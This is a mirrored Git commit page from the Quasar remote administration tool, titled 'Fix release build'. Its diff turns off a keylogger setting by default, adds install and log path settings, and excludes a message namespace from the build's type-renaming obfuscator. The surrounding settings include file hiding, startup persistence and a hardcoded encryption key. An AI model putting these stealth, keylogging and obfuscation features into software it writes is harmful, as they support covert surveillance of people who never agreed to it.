mirror of https://github.com/quasar/Quasar.git
Fix release build
This commit is contained in:
parent
c735d0fcab
commit
547ab1feef
|
@ -24,7 +24,7 @@ public static class Settings
|
|||
public static string MUTEX = "123AKs82kA,ylAo2kAlUS2kYkala!";
|
||||
public static string STARTUPKEY = "Test key";
|
||||
public static bool HIDEFILE = false;
|
||||
public static bool ENABLELOGGER = true;
|
||||
public static bool ENABLELOGGER = false;
|
||||
public static string ENCRYPTIONKEY = "-.)4>[=u%5G3hY3&";
|
||||
public static string TAG = "DEBUG";
|
||||
public static string LOGDIRECTORYNAME = "Logs";
|
||||
|
@ -63,6 +63,8 @@ public static bool Initialize()
|
|||
public static X509Certificate2 SERVERCERTIFICATE;
|
||||
public static bool HIDELOGDIRECTORY = false;
|
||||
public static bool HIDEINSTALLSUBDIRECTORY = false;
|
||||
public static string INSTALLPATH = "";
|
||||
public static string LOGSPATH = "";
|
||||
|
||||
public static bool Initialize()
|
||||
{
|
||||
|
|
|
@ -57,7 +57,7 @@ public bool Perform()
|
|||
|
||||
private void RenameInType(TypeDefinition typeDef)
|
||||
{
|
||||
if (!typeDef.Namespace.StartsWith("Quasar") /* || typeDef.HasInterfaces */)
|
||||
if (!typeDef.Namespace.StartsWith("Quasar") || typeDef.Namespace.StartsWith("Quasar.Common.Messages") /* || typeDef.HasInterfaces */)
|
||||
return;
|
||||
|
||||
_typeOverloader.GiveName(typeDef);
|
||||
|
|
Loading…
Reference in New Issue